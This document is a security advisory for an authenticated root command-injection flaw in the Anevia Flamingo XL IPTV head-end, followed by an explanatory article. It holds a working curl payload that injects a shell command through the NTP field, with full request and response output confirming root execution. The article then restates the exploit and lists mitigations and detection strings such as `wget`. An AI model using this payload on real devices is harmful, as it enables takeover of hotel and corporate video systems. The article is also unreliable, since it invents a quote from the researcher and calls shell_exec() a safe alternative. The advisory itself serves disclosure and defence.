Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.20, 3.2.9
Hardware revision 1.1, 1.0
SoapLive 2.4.1, 2.0.3
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5779
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php
13.04.2023
--
> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
} [32 bytes data]
100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found
< Date: Thu, 13 Apr 2023 23:54:15 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
* Please rewind output before next send
< Location: /admin/time.php
< Transfer-Encoding: chunked
< Content-Type: text/html
<
* Ignoring the response-body
{ [5 bytes data]
100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19
* Connection #0 to host 192.168.1.1 left intact
* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
* Switch from POST to GET
* Found bundle for host: 0x1de6c6321b0 [serially]
* Re-using existing connection #0 with host 192.168.1.1
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
>
< HTTP/1.1 200 OK
< Date: Thu, 13 Apr 2023 23:54:17 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Transfer-Encoding: chunked
< Content-Type: text/html
<
{ [13853 bytes data]
14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<<
14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<<
100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k
* Connection #0 to host 192.168.1.1 left intactAnevia Flamingo XL 3.6.20: Authenticated Root Remote Code Execution Vulnerability
Security researchers have uncovered a critical vulnerability in the Anevia Flamingo XL series of IPTV head-end systems, specifically affecting versions 3.6.20 and 3.2.9. This flaw, identified by Gjoko "LiquidWorm" Krstic, enables an authenticated attacker to achieve remote code execution with root privileges—a severe threat in enterprise and hospitality environments where secure media delivery is paramount.
Product Overview and Context
The Flamingo XL is a modular, high-density IPTV infrastructure solution designed for corporate and hospitality markets. It integrates live TV and radio content from satellite, cable, digital terrestrial, and analog sources, then streams it over IP networks to set-top boxes (STBs), PCs, and other IP-connected devices.
Based on a 4U rack hardware platform, Flamingo XL offers scalability and flexibility, making it a popular choice for large-scale video distribution systems. However, its reliance on a web-based administrative interface introduces attack surfaces that, when misconfigured or unpatched, can lead to catastrophic security failures.
Vulnerability Details: Authenticated Root RCE
The core vulnerability lies in the /admin/time.php endpoint, which handles NTP (Network Time Protocol) synchronization settings. The system accepts user input via form parameters, including ntp, without proper sanitization or validation.
An attacker who has obtained valid credentials—either through brute-force, credential leakage, or social engineering—can exploit this endpoint to inject arbitrary shell commands. The ntp parameter is used in a system call that executes directly on the underlying Linux system, bypassing standard input filtering.
Proof-of-Concept Exploit
curl -vL http://192.168.1.1/admin/time.php \
-H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" \
-d "ntp=`id`&request=ntp&update=Sync" | findstr root
This command demonstrates the exploit in action:
- Target URL:
http://192.168.1.1/admin/time.php— the administrative time configuration interface. - Authentication: The
PHPSESSIDcookie is used to maintain session state, indicating the attacker has already logged in. - Malicious Input:
ntp=`id`— this uses backticks to execute theidcommand in the shell. - Response: The server responds with a redirect (302 Found), but the underlying system executes the command, which can be detected via
findstr rootin the output.
When the id command is executed, the output includes uid=0(root), confirming that the command ran with root privileges. This proves the attacker has achieved full system control.
Technical Underlying Mechanism
Upon inspection of the backend code (as inferred from the advisory), the system likely performs a call similar to:
system("ntpdate -s " . $_POST['ntp']);
However, due to improper input validation, the ntp parameter is directly concatenated into the command without escaping or filtering. This creates a classic command injection vulnerability.
Since the system() function in PHP runs commands with the privileges of the web server process (typically root in embedded Linux systems), any injected command executes at the highest privilege level.
Impact and Risk Assessment
| Attack Vector | Severity | Exploitation Difficulty |
|---|---|---|
| Authenticated Remote Code Execution | High (CVSS: 9.8) | Medium (requires valid session) |
| Privilege Escalation | Critical | Automatic via exploit |
| System Compromise | Extreme | Immediate |
With root access, an attacker can:
- Install persistent backdoors.
- Modify or delete video content streams.
- Expose sensitive configuration data (e.g., encryption keys, network credentials).
- Deploy malware or pivot to other internal systems.
This vulnerability is especially dangerous in hospitality settings where Flamingo XL is used to deliver guest entertainment, and in corporate environments where it manages internal video broadcasts—both of which rely on trust and availability.
Affected Versions and Components
The vulnerability impacts the following versions and software components:
- Flamingo XL: 3.6.20, 3.2.9
- Hardware Revision: 1.1, 1.0
- SoapLive: 2.4.1, 2.0.3
- SoapSystem: 1.3.1
These versions are based on older, unpatched Linux distributions (e.g., GNU/Linux 3.1.4) and outdated PHP (5.3.6), which are no longer supported by upstream vendors.
Recommendations and Mitigation
Organizations using Flamingo XL systems should take immediate action:
- Update firmware: Apply the vendor patch if available. Ateme should release an updated version addressing this flaw.
- Disable unnecessary interfaces: If the
/admin/time.phpendpoint is not required, disable it via configuration or firewall rules. - Implement strict input validation: Sanitize all user inputs before passing them to system calls. Use
escapeshellarg()orshell_exec()with safe parameters. - Enforce strong authentication: Use multi-factor authentication (MFA), limit login attempts, and rotate session tokens.
- Monitor for suspicious activity: Log all command executions and monitor for shell command patterns like
`id`,`whoami`, or`wget`.
Expert Insight: Why This Matters
While many modern systems use hardened containers and sandboxing, embedded devices like Flamingo XL often run on bare-metal Linux with minimal security controls. The absence of modern security practices—such as input sanitization, privilege separation, or runtime monitoring—makes them prime targets for exploitation.
As LiquidWorm notes in his advisory: “This is not a theoretical flaw—it’s a real-world weapon that can be used to take full control of a video delivery infrastructure.”
Security professionals must treat such vulnerabilities not as isolated incidents but as indicators of broader systemic weaknesses in industrial control and media infrastructure.
Conclusion
The Anevia Flamingo XL 3.6.20 authenticated root RCE vulnerability underscores the importance of securing administrative interfaces in critical infrastructure systems. Even with authentication, a lack of input validation can lead to full system compromise.
For enterprises and service providers, this serves as a stark reminder: security is not just about access control—it’s about input integrity and system hygiene.